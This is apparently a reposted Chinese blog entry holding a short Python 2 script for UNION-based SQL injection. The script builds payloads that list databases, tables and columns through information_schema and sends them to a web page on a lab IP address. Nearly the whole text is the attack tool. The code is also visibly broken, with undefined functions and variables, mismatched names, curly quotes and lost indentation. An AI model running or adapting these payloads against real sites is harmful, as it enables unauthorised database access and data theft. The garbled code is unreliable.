sqli自用腳本
阿新 • • 發佈:2019-01-27
getc 部分 php 取數 eas 註入 The 則表達式 http
//sqliIsSoEasy.py
import requests
import urllib
import re
payload={}
payload_db = "1 and 1=2 union select 1,concat(0x7177657E,schema_name,0x7E717765) from INFORMATION_SCHEMA.SCHEMATA"
payload_tb = "1 union select 1,concat(0x7177657E,table_name,0x7E717765) from information_schema.tables where table_schema="+"‘"+database_name+"‘"
payload_col = "1 union select 1,concat(0x7177657E,column_name,0x7E717765) from information_schema.columns where table_name="+"‘"+table_name+"‘"
#有回顯的聯合查詢:通過一個正則表達式判斷是否有註入成功後的內容,若有則返回所需部分內容
def visitUrlByUnion(url,payload):
data = urllib.urlencode(values)
geturl = url+‘?‘+data
response = requests.get(geturl)
result=response.content
find_list=re.findall(r"qwe~(.+?)~qwe", result)
if len(find_list)>0:
return find_list
#獲取數據庫列表
def getDBName(url):
name_list=get(url,payload_db)
print ‘The databases:‘
for i in name_list:
print i+" ",
print "\n"
#選擇數據庫,獲取表
def getTBName(url):
database_name=raw_input(‘please input your database:‘)
name_list=get(url,payload_tb)
print ‘The tables:‘
for i in name_list:
print i+" ",
print "\n"
#選擇表,獲取字段
def getCOLName(url):
table_name=raw_input(‘please input your table:‘)
name_list=get(url,payload_col)
print ‘The columns:‘
for i in name_list:
print i+" ",
#選擇所有字段,獲取數據
if __name__ == ‘__main__‘:
url=‘http://192.168.106.130/config/sql.php‘
getDBName(url)
getTBName(url)
getColName(url)
sqli自用腳本